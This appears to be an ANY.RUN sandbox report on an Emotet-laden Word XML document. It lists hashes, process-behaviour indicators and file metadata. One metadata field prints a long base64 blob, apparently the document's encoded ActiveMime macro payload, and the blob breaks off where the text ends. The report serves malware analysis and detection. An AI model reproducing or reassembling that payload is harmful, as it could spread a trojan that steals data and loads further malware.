analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

asdfasdf.doc

Full analysis: https://app.any.run/tasks/420714c3-8fcf-4b33-a834-e3898fefd3bd
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 23, 2019, 10:08:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

C8A65DCF63D22A1798385E7A9908A17B

SHA1:

224807E7D5A89718EAC50CF7D6A390A936118CB8

SHA256:

A6E5D329FDA48244000EF4AC47A2872DEEA0A005D662279934ED1B5430E1A33A

SSDEEP:

3072:Mbw+aINTjL/xSu90OoiLuDKZXfwKeljR1z:MWIN7xUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3048)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3048)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2752)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2376)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1328)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2376)
    • Application was dropped or rewritten from another process

      • 784.exe (PID: 3480)
      • 784.exe (PID: 2600)
      • wabmetagen.exe (PID: 3976)
      • wabmetagen.exe (PID: 2572)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3376)
    • Application launched itself

      • cmd.exe (PID: 3072)
      • cmd.exe (PID: 2752)
      • 784.exe (PID: 3480)
      • wabmetagen.exe (PID: 3976)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3072)
      • cmd.exe (PID: 2752)
      • cmd.exe (PID: 2452)
      • cmd.exe (PID: 3204)
    • Creates files in the user directory

      • powershell.exe (PID: 2376)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2376)
      • 784.exe (PID: 2600)
    • Starts itself from another location

      • 784.exe (PID: 2600)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3048)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3048)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 00F74043
WordDocumentBodySectPRsidRDefault: 00D718DB
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: 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 